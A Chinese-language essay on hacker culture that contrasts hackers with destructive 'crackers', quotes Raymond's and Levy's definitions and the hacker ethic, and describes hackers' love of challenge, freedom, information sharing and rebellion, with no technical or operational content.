如何让自己成为一名黑客高手全集 什么是黑客在日本出版的《新黑客字典》中,对黑客是这样定义的:“喜欢探索软件程序并从中增长了其个人才干的人。他们不像绝大多数电脑使用者那样,只规规矩矩地了解别人指定的狭小的一部分知识”。在Open Source(开放源代码)旗手ERIC。S。RAYMOND的《The New Hacker"s Dictionary》一文中,对“Hacker”的解释包括了下面几类人: 一:那些喜欢发掘程序系统内部实现细节的人,在这种发掘过程中,他们延伸并扩展着自己的能力,这和只满足于学习有限知识的人是截然不同的 二:那些狂热地沉浸在编程乐趣的人,而且,他们不仅仅是在理论上谈及编程 三:一个高超的程序设计专家 四:一个喜欢智力挑战的,并创造性地突破各种环境限制的人 五:一个恶意的爱管闲事的家伙,他试图在网络上逡巡溜达的同时发现一些敏感的信息对最后一类人,ERIC。S。RAYMOND赋予其更恰当的一个称谓,那就是“Cra cker”,有就是我们常说的“骇客”,指那些乐于破坏的家伙。当他们在给这个社会制造着麻烦和噱头的同时,就只能被冠以“骇客”之名。正是因为“骇客”的存在,纯正而古老的黑客精神才愈来愈被人曲解,但在真正崇尚黑客精神的一类人眼里,“骇客”与“黑客”是如此的泾渭分明,不可混淆!更有甚者,有些黑客们说:在黑客界,斗争只存在于“黑客”和“骇客”之间! 黑客群体有自己特有的一套行为准则(the hacker ethic)美国学者史蒂夫。利维在其著名的《黑客电脑史》中所指出的黑客道德准则(the hacker ethic)就是对其最深刻的表述:(1),通往电脑的路不止一条 (2),所有的信息都应当是免费共享的 (3),一定要打破电脑集权 (4),在电脑上创造的是艺术和美 (5),计算机将使生活更加美好 可以看出,“黑客道德准则”正是这个独特的文化群体一直心照不宣地遵循着的“江湖规矩”,以这种“江湖规矩”作为参照,黑客们的行为特征也就清晰地呈现给我们了! 一,热衷挑战 黑客们多数都有很高的智慧,至少在某些方面表现突出。他们喜欢挑战自己的能力,编写高难度程序,破译电脑密码给他们带来了神气的魔力,认为运用自己的智慧和电脑技术去突破某些著名的防卫措施森严的站点是一件极、富刺激性和挑战性的冒险活动。 二,崇尚自由 黑客文化首先给人的突出感觉就是一种自由不羁的的精神。黑客如同夜行的蝙蝠侠,任意穿梭在网络空间中。黑客在电脑虚拟世界发挥着自己的极致的自由。 他们随意登录在世界各地的网站,完成着现实生活中无法企及的冒险旅程,实现着个人生命的虚拟体验。正是这种对自由的体验,使黑客如同吸毒上瘾一样,对网络入侵乐此不疲三,主张信息共享 黑客们认为所有的信息都应当是免费的和公开的,认为计算机应该是大众的工具,而不应该只为有钱人私有。信息应该是不受限制的,它属于每个人,拥有知识或信息是每个人的天赋权利 四,反叛精神 黑客文化带有某种反叛世界的倾向,黑客们蔑视传统,反抗权威,痛恨集权,其行为模式以深深烙上了无政府主义的印记。互联网的一个显著特点是平等和共享,对于在网络中存在的许多禁区,黑客们认为是有违网络特征的,他们希望建立一个没有权威,没有既定程序的社会,所以他们一般都喜欢与传统,权威和集权做永无休止的斗争